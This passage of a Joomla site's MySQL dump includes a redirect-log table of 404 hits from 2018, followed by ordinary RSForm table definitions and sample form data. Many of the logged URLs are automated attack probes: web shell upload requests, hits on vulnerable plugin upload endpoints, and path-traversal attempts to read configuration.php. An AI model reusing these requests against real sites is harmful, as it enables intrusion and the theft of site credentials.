00:00:00'),(14182,'http://hallcrestheights.org//includes/u2p.php?z3=eVlkc3BPLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:37:43','0000-00-00 00:00:00'),(14183,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=eVlkc3BPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:38:46','0000-00-00 00:00:00'),(14184,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=eVlkc3BPLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:47','0000-00-00 00:00:00'),(14185,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=eVlkc3BPLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:49','0000-00-00 00:00:00'),(14186,'http://hallcrestheights.org//update.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:52','0000-00-00 00:00:00'),(14187,'http://hallcrestheights.org//wp-main.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:54','0000-00-00 00:00:00'),(14188,'http://hallcrestheights.org//images/robots.txt.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:57','0000-00-00 00:00:00'),(14189,'http://hallcrestheights.org//cli/40dd1d.php?z3=eVlkc3BPLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:38:59','0000-00-00 00:00:00'),(14190,'http://hallcrestheights.org//xGSx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2018-03-15 07:39:04','0000-00-00 00:00:00'),(14191,'http://hallcrestheights.org//error-log.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:43:16','0000-00-00 00:00:00'),(14192,'http://www.hallcrestheights.org//wp-content/plugins/xaisyndicate/idx.php',NULL,'','',2,0,'2018-03-16 13:48:38','0000-00-00 00:00:00'),(14193,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/NULLpOint7r__xequg.php',NULL,'','',1,0,'2018-03-18 14:01:00','0000-00-00 00:00:00'),(14194,'http://hallcrestheights.org/wp-content/plugins/showbiz/temp/update_extract/NULLpOint7r__hltok.php',NULL,'','',1,0,'2018-03-18 13:59:42','0000-00-00 00:00:00'),(14195,'http://hallcrestheights.org//components/com_jce/jce.php',NULL,'','',1,0,'2018-03-18 22:32:14','0000-00-00 00:00:00'),(14196,'http://hallcrestheights.org//components/com_b2jcontact/b2jcontact.php',NULL,'','',1,0,'2018-03-18 22:32:39','0000-00-00 00:00:00'),(14197,'http://hallcrestheights.org//wp-content/plugins/formcraft/file-upload/server/php/index.php',NULL,'','',1,0,'2018-03-18 22:39:28','0000-00-00 00:00:00'),(14198,'http://hallcrestheights.org//components/com_foxcontact/foxcontact.php',NULL,'','',1,0,'2018-03-18 22:41:16','0000-00-00 00:00:00'),(14199,'http://hallcrestheights.org//components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2018-03-18 22:41:51','0000-00-00 00:00:00'),(14200,'http://hallcrestheights.org//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload',NULL,'','',2,0,'2018-03-19 02:14:56','0000-00-00 00:00:00'),(14201,'http://hallcrestheights.org//rxr.php',NULL,'','',1,0,'2018-03-19 02:14:58','0000-00-00 00:00:00'),(14202,'http://hallcrestheights.org/libraries/joomla/cache/storage/memcaches.php',NULL,'hallcrestheights.org','',1,0,'2018-03-19 17:15:50','0000-00-00 00:00:00'),(14203,'http://hallcrestheights.org/modules/mod_search/tmpl/defaults.php',NULL,'hallcrestheights.org','',1,0,'2018-03-19 17:15:58','0000-00-00 00:00:00'),(14204,'http://hallcrestheights.org//wp-content/plugins/xaisyndicate/idx.php',NULL,'','',2,0,'2018-03-19 23:43:55','0000-00-00 00:00:00'),(14205,'https://hallcrestheights.org/libraries/joomla/cache/storage/memcaches.php',NULL,'hallcrestheights.org','',1,0,'2018-03-20 07:59:50','0000-00-00 00:00:00'),(14206,'https://hallcrestheights.org/modules/mod_search/tmpl/defaults.php',NULL,'hallcrestheights.org','',1,0,'2018-03-20 08:02:48','0000-00-00 00:00:00'),(14207,'http://hallcrestheights.org/an.php',NULL,'','',1,0,'2018-03-21 23:15:33','0000-00-00 00:00:00'),(14208,'http://hallcrestheights.org/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2018-03-21 23:15:45','0000-00-00 00:00:00'),(14209,'http://hallcrestheights.org/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2018-03-21 23:16:38','0000-00-00 00:00:00'),(14210,'http://hallcrestheights.org/function-sync.php',NULL,'','',1,0,'2018-03-21 23:17:08','0000-00-00 00:00:00'),(14211,'http://hallcrestheights.org/wp-content/plugins/background-image-cropper/image/ico/search.php',NULL,'','',1,0,'2018-03-21 23:17:37','0000-00-00 00:00:00'),(14212,'http://hallcrestheights.org/assets/images/search.php',NULL,'','',1,0,'2018-03-21 23:20:47','0000-00-00 00:00:00'),(14213,'http://hallcrestheights.org/wp-dbs.php',NULL,'','',1,0,'2018-03-21 23:21:04','0000-00-00 00:00:00'),(14214,'http://hallcrestheights.org/components/com_b2jcontact/izoc.php',NULL,'','',2,0,'2018-03-28 18:39:21','0000-00-00 00:00:00'),(14215,'http://hallcrestheights.org/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',NULL,'','',2,0,'2018-03-29 06:26:54','0000-00-00 00:00:00'),(14216,'http://hallcrestheights.org/components/com_b2jcontact/css/',NULL,'','',1,0,'2018-03-29 19:44:45','0000-00-00 00:00:00'),(14217,'http://hallcrestheights.org/vuln.php',NULL,'','',1,0,'2018-03-29 23:42:20','0000-00-00 00:00:00'),(14218,'http://hallcrestheights.org/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php',NULL,'','',2,0,'2018-03-29 23:43:20','0000-00-00 00:00:00'),(14219,'http://hallcrestheights.org/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php',NULL,'','',1,0,'2018-03-29 23:43:23','0000-00-00 00:00:00'),(14220,'http://hallcrestheights.org/zXAttacker.php',NULL,'','',1,0,'2018-03-29 23:43:28','0000-00-00 00:00:00'),(14221,'http://hallcrestheights.org/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',1,0,'2018-03-29 23:43:33','0000-00-00 00:00:00'),(14222,'http://hallcrestheights.org/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2018-03-29 23:43:36','0000-00-00 00:00:00'),(14223,'http://hallcrestheights.org/modules/mod_socialpinboard_menu/images/socialpinboard/temp/error.php',NULL,'','',1,0,'2018-03-29 23:43:37','0000-00-00 00:00:00'),(14224,'http://hallcrestheights.org/tmp/plupload/RxR.php',NULL,'','',1,0,'2018-03-29 23:42:22','0000-00-00 00:00:00'),(14225,'http://hallcrestheights.org/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-03-29 23:43:56','0000-00-00 00:00:00'),(14226,'http://hallcrestheights.org/com_sexycontactform/fileupload/files/error.php',NULL,'','',1,0,'2018-03-29 23:44:02','0000-00-00 00:00:00'),(14227,'http://hallcrestheights.org/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2018-03-29 23:44:31','0000-00-00 00:00:00'),(14228,'http://hallcrestheights.org/modules/megamenu/uploadify/error.php',NULL,'','',1,0,'2018-03-29 23:44:33','0000-00-00 00:00:00'),(14229,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/error.php',NULL,'','',1,0,'2018-03-29 23:44:36','0000-00-00 00:00:00'),(14230,'http://hallcrestheights.org/jwallpapers_files/plupload/error.php',NULL,'','',1,0,'2018-03-29 23:43:33','0000-00-00 00:00:00'),(14231,'http://hallcrestheights.org/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2018-03-29 23:44:59','0000-00-00 00:00:00'),(14232,'http://hallcrestheights.org/components/com_facileforms/libraries/jquery/error.php',NULL,'','',1,0,'2018-03-29 23:45:02','0000-00-00 00:00:00'),(14233,'http://hallcrestheights.org/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=',NULL,'','',1,0,'2018-03-29 23:45:35','0000-00-00 00:00:00'),(14234,'http://hallcrestheights.org/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php',NULL,'','',1,0,'2018-03-29 23:45:39','0000-00-00 00:00:00'),(14235,'http://hallcrestheights.org/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=',NULL,'','',1,0,'2018-03-29 23:45:54','0000-00-00 00:00:00'),(14236,'http://hallcrestheights.org/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',1,0,'2018-03-29 23:45:57','0000-00-00 00:00:00'),(14237,'http://hallcrestheights.org/netcat/admin/',NULL,'http://hallcrestheights.org/netcat/admin/','',1,0,'2018-03-31 20:35:54','0000-00-00 00:00:00'),(14238,'http://041d809.netsolhost.com/home/images/homefront.jpg',NULL,'http://041d809.netsolhost.com/home/','',1,0,'2018-04-15 20:37:56','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `jos_redirect_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_component_type_fields` -- DROP TABLE IF EXISTS `jos_rsform_component_type_fields`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_component_type_fields` ( `ComponentTypeFieldId` int(11) NOT NULL AUTO_INCREMENT, `ComponentTypeId` int(11) NOT NULL DEFAULT '0', `FieldName` text NOT NULL, `FieldType` enum('hidden','hiddenparam','textbox','textarea','select','emailattach') NOT NULL DEFAULT 'hidden', `FieldValues` text NOT NULL, `Ordering` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`ComponentTypeFieldId`), KEY `ComponentTypeId` (`ComponentTypeId`) ) ENGINE=InnoDB AUTO_INCREMENT=178 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_component_type_fields` -- LOCK TABLES `jos_rsform_component_type_fields` WRITE; /*!40000 ALTER TABLE `jos_rsform_component_type_fields` DISABLE KEYS */; INSERT INTO `jos_rsform_component_type_fields` VALUES (2,1,'NAME','textbox','',1),(3,1,'CAPTION','textbox','',2),(4,1,'REQUIRED','select','NO\r\nYES',3),(5,1,'SIZE','textbox','20',4),(6,1,'MAXSIZE','textbox','',5),(7,1,'VALIDATIONRULE','select','//<code>\r\nreturn RSgetValidationRules();\r\n//</code>',6),(8,1,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',7),(9,1,'ADDITIONALATTRIBUTES','textarea','',8),(10,1,'DEFAULTVALUE','textarea','',9),(11,1,'DESCRIPTION','textarea','',11),(12,1,'COMPONENTTYPE','hidden','1',15),(13,2,'NAME','textbox','',1),(14,2,'CAPTION','textbox','',2),(15,2,'REQUIRED','select','NO\r\nYES',3),(16,2,'COLS','textbox','50',4),(17,2,'ROWS','textbox','5',5),(18,2,'VALIDATIONRULE','select','//<code>\r\nreturn RSgetValidationRules();\r\n//</code>',6),(19,2,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',7),(20,2,'ADDITIONALATTRIBUTES','textarea','',8),(21,2,'DEFAULTVALUE','textarea','',9),(22,2,'DESCRIPTION','textarea','',10),(23,2,'COMPONENTTYPE','hidden','2',10),(24,3,'NAME','textbox','',1),(25,3,'CAPTION','textbox','',2),(26,3,'SIZE','textbox','',3),(27,3,'MULTIPLE','select','NO\r\nYES',4),(28,3,'ITEMS','textarea','',5),(29,3,'REQUIRED','select','NO\r\nYES',6),(30,3,'ADDITIONALATTRIBUTES','textarea','',7),(31,3,'DESCRIPTION','textarea','',8),(32,3,'COMPONENTTYPE','hidden','3',10),(33,4,'NAME','textbox','',1),(34,4,'CAPTION','textbox','',2),(35,4,'ITEMS','textarea','',3),(36,4,'FLOW','select','HORIZONTAL\r\nVERTICAL',4),(37,4,'REQUIRED','select','NO\r\nYES',5),(38,4,'ADDITIONALATTRIBUTES','textarea','',6),(39,4,'DESCRIPTION','textarea','',6),(40,4,'COMPONENTTYPE','hidden','4',7),(41,5,'NAME','textbox','',1),(42,5,'CAPTION','textbox','',2),(43,5,'ITEMS','textarea','',3),(44,5,'FLOW','select','HORIZONTAL\r\nVERTICAL',4),(45,5,'REQUIRED','select','NO\r\nYES',5),(46,5,'ADDITIONALATTRIBUTES','textarea','',6),(47,5,'DESCRIPTION','textarea','',6),(48,5,'COMPONENTTYPE','hidden','5',7),(49,6,'NAME','textbox','',1),(50,6,'CAPTION','textbox','',2),(51,6,'REQUIRED','select','NO\r\nYES',3),(52,6,'DATEFORMAT','textbox','DDMMYYYY',4),(53,6,'CALENDARLAYOUT','select','FLAT\r\nPOPUP',5),(54,6,'ADDITIONALATTRIBUTES','textarea','',6),(55,6,'DESCRIPTION','textarea','',7),(56,6,'COMPONENTTYPE','hidden','6',8),(57,7,'NAME','textbox','',1),(58,7,'CAPTION','textbox','',2),(59,7,'LABEL','textbox','',3),(60,7,'RESET','select','NO\r\nYES',4),(61,7,'RESETLABEL','textbox','',5),(62,7,'ADDITIONALATTRIBUTES','textarea','',6),(63,7,'DESCRIPTION','textarea','',7),(64,7,'COMPONENTTYPE','hidden','7',8),(65,8,'NAME','textbox','',1),(66,8,'CAPTION','textbox','',2),(67,8,'LENGTH','textbox','4',3),(68,8,'BACKGROUNDCOLOR','textbox','#FFFFFF',4),(69,8,'TEXTCOLOR','textbox','#000000',5),(70,8,'TYPE','select','ALPHA\r\nNUMERIC\r\nALPHANUMERIC',6),(71,8,'ADDITIONALATTRIBUTES','textarea','style=\"text-align:center;width:75px;\"',7),(72,8,'DESCRIPTION','textarea','',9),(73,8,'COMPONENTTYPE','hidden','8',9),(74,9,'NAME','textbox','',1),(75,9,'CAPTION','textbox','',2),(76,9,'FILESIZE','textbox','',3),(77,9,'REQUIRED','select','NO\r\nYES',4),(78,9,'ACCEPTEDFILES','textarea','',5),(79,9,'DESTINATION','textbox','//<code>\r\nreturn JPATH_SITE.DS.\'components\'.DS.\'com_rsform\'.DS.\'uploads\'.DS;\r\n//</code>',6),(80,9,'ADDITIONALATTRIBUTES','textarea','',7),(81,9,'DESCRIPTION','textarea','',8),(82,9,'COMPONENTTYPE','hidden','9',9),(83,10,'NAME','textbox','',1),(84,10,'TEXT','textarea','',1),(85,10,'COMPONENTTYPE','hidden','10',9),(86,11,'NAME','textbox','',1),(87,11,'DEFAULTVALUE','textarea','',1),(88,11,'ADDITIONALATTRIBUTES','textarea','',1),(89,11,'COMPONENTTYPE','hidden','11',9),(109,12,'NAME','textbox','',1),(110,12,'CAPTION','textbox','',2),(111,12,'LABEL','textbox','',3),(112,12,'IMAGEBUTTON','textbox','',4),(113,12,'IMAGERESET','textbox','',5),(114,12,'RESET','select','NO\r\nYES',6),(115,12,'RESETLABEL','textbox','',7),(117,12,'ADDITIONALATTRIBUTES','textarea','',9),(118,12,'COMPONENTTYPE','hidden','12',10),(119,13,'NAME','textbox','',1),(120,13,'CAPTION','textbox','',3),(121,13,'LABEL','textbox','',2),(122,13,'RESET','select','NO\r\nYES',6),(123,13,'RESETLABEL','textbox','',7),(125,13,'ADDITIONALATTRIBUTES','textarea','',9),(126,13,'COMPONENTTYPE','hidden','13',10),(127,14,'NAME','textbox','',1),(128,14,'CAPTION','textbox','',2),(129,14,'REQUIRED','select','NO\r\nYES',3),(130,14,'SIZE','textbox','',4),(131,14,'MAXSIZE','textbox','',5),(132,14,'DEFAULTVALUE','textarea','',6),(133,14,'ADDITIONALATTRIBUTES','textarea','',7),(134,14,'COMPONENTTYPE','hidden','14',8),(135,15,'NAME','textbox','',1),(138,15,'LENGTH','textbox','8',4),(140,15,'ADDITIONALATTRIBUTES','textarea','',7),(141,15,'COMPONENTTYPE','hidden','15',8),(142,14,'DESCRIPTION','textarea','',100),(143,8,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(144,3,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(145,4,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(146,5,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(147,6,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(148,14,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(149,9,'VALIDATIONMESSAGE','textarea','INVALIDINPUT',100),(150,8,'FLOW','select','VERTICAL\r\nHORIZONTAL',7),(151,8,'SHOWREFRESH','select','NO\r\nYES',8),(152,8,'REFRESHTEXT','textbox','REFRESH',11),(153,6,'READONLY','select','NO\r\nYES',6),(154,12,'DESCRIPTION','textarea','',10),(155,6,'POPUPLABEL','textbox','...',6),(157,15,'CHARACTERS','select','ALPHANUMERIC\r\nALPHA\r\nNUMERIC',3),(160,2,'WYSIWYG','select','NO\r\nYES',11),(161,8,'SIZE','textbox','15',12),(162,8,'IMAGETYPE','select','FREETYPE\r\nNOFREETYPE\r\nINVISIBLE',3),(163,1,'VALIDATIONEXTRA','textbox','',6),(164,2,'VALIDATIONEXTRA','textbox','',6),(165,14,'VALIDATIONRULE','select','//<code>\r\nreturn RSgetValidationRules();\r\n//</code>',9),(166,9,'PREFIX','textarea','',6),(167,13,'PREVBUTTON','textbox','//<code>\r\nreturn JText::_(\'PREV\');\r\n//</code>',8),(168,41,'NAME','textbox','',1),(169,41,'COMPONENTTYPE','hidden','41',5),(170,41,'NEXTBUTTON','textbox','//<code>\r\nreturn JText::_(\'NEXT\');\r\n//</code>',2),(171,41,'PREVBUTTON','textbox','//<code>\r\nreturn JText::_(\'PREV\');\r\n//</code>',3),(172,41,'ADDITIONALATTRIBUTES','textarea','',4),(173,41,'VALIDATENEXTPAGE','select','NO\r\nYES',5),(174,6,'MINDATE','textbox','',5),(175,6,'MAXDATE','textbox','',5),(176,6,'DEFAULTVALUE','textarea','',2),(177,9,'EMAILATTACH','emailattach','',102); /*!40000 ALTER TABLE `jos_rsform_component_type_fields` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_component_types` -- DROP TABLE IF EXISTS `jos_rsform_component_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_component_types` ( `ComponentTypeId` int(11) NOT NULL AUTO_INCREMENT, `ComponentTypeName` text NOT NULL, PRIMARY KEY (`ComponentTypeId`) ) ENGINE=InnoDB AUTO_INCREMENT=42 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_component_types` -- LOCK TABLES `jos_rsform_component_types` WRITE; /*!40000 ALTER TABLE `jos_rsform_component_types` DISABLE KEYS */; INSERT INTO `jos_rsform_component_types` VALUES (1,'textBox'),(2,'textArea'),(3,'selectList'),(4,'checkboxGroup'),(5,'radioGroup'),(6,'calendar'),(7,'button'),(8,'captcha'),(9,'fileUpload'),(10,'freeText'),(11,'hidden'),(12,'imageButton'),(13,'submitButton'),(14,'password'),(15,'ticket'),(41,'pageBreak'); /*!40000 ALTER TABLE `jos_rsform_component_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_components` -- DROP TABLE IF EXISTS `jos_rsform_components`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_components` ( `ComponentId` int(11) NOT NULL AUTO_INCREMENT, `FormId` int(11) NOT NULL DEFAULT '0', `ComponentTypeId` int(11) NOT NULL DEFAULT '0', `Order` int(11) NOT NULL DEFAULT '0', `Published` tinyint(1) NOT NULL DEFAULT '1', UNIQUE KEY `ComponentId` (`ComponentId`), KEY `ComponentTypeId` (`ComponentTypeId`), KEY `FormId` (`FormId`) ) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_components` -- LOCK TABLES `jos_rsform_components` WRITE; /*!40000 ALTER TABLE `jos_rsform_components` DISABLE KEYS */; INSERT INTO `jos_rsform_components` VALUES (1,1,1,2,1),(2,1,10,1,1),(3,1,1,3,1),(4,1,3,4,1),(5,1,5,5,1),(6,1,4,6,1),(7,1,6,7,1),(8,1,13,8,1),(9,1,10,9,1),(10,2,1,2,1),(11,2,10,1,1),(12,2,1,3,1),(13,2,3,6,1),(14,2,5,7,1),(15,2,4,10,1),(16,2,6,11,1),(17,2,13,12,1),(18,2,10,13,1),(19,2,41,4,1),(20,2,41,8,1),(21,2,10,5,1),(22,2,10,9,1); /*!40000 ALTER TABLE `jos_rsform_components` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_config` -- DROP TABLE IF EXISTS `jos_rsform_config`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_config` ( `ConfigId` int(11) NOT NULL AUTO_INCREMENT, `SettingName` varchar(64) NOT NULL DEFAULT '', `SettingValue` text NOT NULL, PRIMARY KEY (`ConfigId`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_config` -- LOCK TABLES `jos_rsform_config` WRITE; /*!40000 ALTER TABLE `jos_rsform_config` DISABLE KEYS */; INSERT INTO `jos_rsform_config` VALUES (1,'global.register.code',''),(2,'global.debug.mode','0'),(3,'global.iis','1'),(4,'global.editor','1'); /*!40000 ALTER TABLE `jos_rsform_config` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_emails` -- DROP TABLE IF EXISTS `jos_rsform_emails`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_emails` ( `id` int(11) NOT NULL AUTO_INCREMENT, `formId` int(11) NOT NULL, `from` varchar(255) NOT NULL, `fromname` varchar(255) NOT NULL, `replyto` varchar(255) NOT NULL, `to` varchar(255) NOT NULL, `cc` varchar(255) NOT NULL, `bcc` varchar(255) NOT NULL, `subject` varchar(255) NOT NULL, `mode` tinyint(1) NOT NULL, `message` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_emails` -- LOCK TABLES `jos_rsform_emails` WRITE; /*!40000 ALTER TABLE `jos_rsform_emails` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_emails` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_forms` -- DROP TABLE IF EXISTS `jos_rsform_forms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_forms` ( `FormId` int(11) NOT NULL AUTO_INCREMENT, `FormName` text NOT NULL, `FormLayout` longtext NOT NULL, `FormLayoutName` text NOT NULL, `FormLayoutAutogenerate` tinyint(1) NOT NULL DEFAULT '1', `CSS` text NOT NULL, `JS` text NOT NULL, `FormTitle` text NOT NULL, `Published` tinyint(1) NOT NULL DEFAULT '1', `Lang` varchar(255) NOT NULL DEFAULT '', `ReturnUrl` text NOT NULL, `ShowThankyou` tinyint(1) NOT NULL DEFAULT '1', `Thankyou` text NOT NULL, `ShowContinue` tinyint(1) NOT NULL DEFAULT '1', `UserEmailText` text NOT NULL, `UserEmailTo` text NOT NULL, `UserEmailCC` varchar(255) NOT NULL, `UserEmailBCC` varchar(255) NOT NULL, `UserEmailFrom` varchar(255) NOT NULL DEFAULT '', `UserEmailReplyTo` varchar(255) NOT NULL, `UserEmailFromName` varchar(255) NOT NULL DEFAULT '', `UserEmailSubject` varchar(255) NOT NULL DEFAULT '', `UserEmailMode` tinyint(4) NOT NULL DEFAULT '1', `UserEmailAttach` tinyint(4) NOT NULL, `UserEmailAttachFile` varchar(255) NOT NULL, `AdminEmailText` text NOT NULL, `AdminEmailTo` text NOT NULL, `AdminEmailCC` varchar(255) NOT NULL, `AdminEmailBCC` varchar(255) NOT NULL, `AdminEmailFrom` varchar(255) NOT NULL DEFAULT '', `AdminEmailReplyTo` varchar(255) NOT NULL, `AdminEmailFromName` varchar(255) NOT NULL DEFAULT '', `AdminEmailSubject` varchar(255) NOT NULL DEFAULT '', `AdminEmailMode` tinyint(4) NOT NULL DEFAULT '1', `ScriptProcess` text NOT NULL, `ScriptProcess2` text NOT NULL, `ScriptDisplay` text NOT NULL, `UserEmailScript` text NOT NULL, `AdminEmailScript` text NOT NULL, `MetaTitle` tinyint(1) NOT NULL, `MetaDesc` text NOT NULL, `MetaKeywords` text NOT NULL, `Required` varchar(255) NOT NULL DEFAULT '(*)', `ErrorMessage` text NOT NULL, `MultipleSeparator` varchar(64) NOT NULL DEFAULT '\\n', `TextareaNewLines` tinyint(1) NOT NULL DEFAULT '1', `CSSClass` varchar(255) NOT NULL, `CSSId` varchar(255) NOT NULL DEFAULT 'userForm', `CSSName` varchar(255) NOT NULL, `CSSAction` text NOT NULL, `CSSAdditionalAttributes` text NOT NULL, `AjaxValidation` tinyint(1) NOT NULL, `ThemeParams` text NOT NULL, `Keepdata` tinyint(1) NOT NULL DEFAULT '1', `Backendmenu` tinyint(1) NOT NULL, `ConfirmSubmission` tinyint(1) NOT NULL DEFAULT '0', PRIMARY KEY (`FormId`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_forms` -- LOCK TABLES `jos_rsform_forms` WRITE; /*!40000 ALTER TABLE `jos_rsform_forms` DISABLE KEYS */; INSERT INTO `jos_rsform_forms` VALUES (1,'RSformPro example','<fieldset class=\"formFieldset\">\n<legend>{global:formtitle}</legend>\n{error}\n<!-- Do not remove this ID, it is used to identify the page so that the pagination script can work correctly -->\n<ol class=\"formContainer\" id=\"rsform_1_page_0\">\n <li class=\"rsform-block rsform-block-header\">\n <div class=\"formCaption\">{Header:caption}</div>\n <div class=\"formBody\">{Header:body}<span class=\"formClr\">{Header:validation}</span></div>\n <div class=\"formDescription\">{Header:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-fullname\">\n <div class=\"formCaption\">{FullName:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{FullName:body}<span class=\"formClr\">{FullName:validation}</span></div>\n <div class=\"formDescription\">{FullName:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-email\">\n <div class=\"formCaption\">{Email:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{Email:body}<span class=\"formClr\">{Email:validation}</span></div>\n <div class=\"formDescription\">{Email:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-companysize\">\n <div class=\"formCaption\">{CompanySize:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{CompanySize:body}<span class=\"formClr\">{CompanySize:validation}</span></div>\n <div class=\"formDescription\">{CompanySize:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-position\">\n <div class=\"formCaption\">{Position:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{Position:body}<span class=\"formClr\">{Position:validation}</span></div>\n <div class=\"formDescription\">{Position:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-contactby\">\n <div class=\"formCaption\">{ContactBy:caption}</div>\n <div class=\"formBody\">{ContactBy:body}<span class=\"formClr\">{ContactBy:validation}</span></div>\n <div class=\"formDescription\">{ContactBy:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-contactwhen\">\n <div class=\"formCaption\">{ContactWhen:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{ContactWhen:body}<span class=\"formClr\">{ContactWhen:validation}</span></div>\n <div class=\"formDescription\">{ContactWhen:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-submit\">\n <div class=\"formCaption\">{Submit:caption}</div>\n <div class=\"formBody\">{Submit:body}<span class=\"formClr\">{Submit:validation}</span></div>\n <div class=\"formDescription\">{Submit:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-footer\">\n <div class=\"formCaption\">{Footer:caption}</div>\n <div class=\"formBody\">{Footer:body}<span class=\"formClr\">{Footer:validation}</span></div>\n <div class=\"formDescription\">{Footer:description}</div>\n </li>\n</ol>\n</fieldset>','inline-xhtml',1,'','','RSForm! Pro example',1,'','',1,'<p>Dear {FullName:value},</p><p> thank you for your submission. One of our staff members will contact you by {ContactBy:value} as soon as possible.</p>',1,'<p>Dear {FullName:value},</p><p> we received your contact request. Someone will get back to you by {ContactBy:value} soon. </p>','{Email:value}','','','your@email.com','','Your Company','Contact confirmation',1,0,'','<p>Customize this e-mail also. You will receive it as administrator. </p><p>{FullName:caption}:{FullName:value}<br />\n{Email:caption}:{Email:value}<br />\n{CompanySize:caption}:{CompanySize:value}<br />\n{Position:caption}:{Position:value}<br />\n{ContactBy:caption}:{ContactBy:value}<br />\n{ContactWhen:caption}:{ContactWhen:value}</p>','youradminemail@email.com','','','{Email:value}','','Your Company','Contact',1,'','','','','',0,'This is the meta description of your 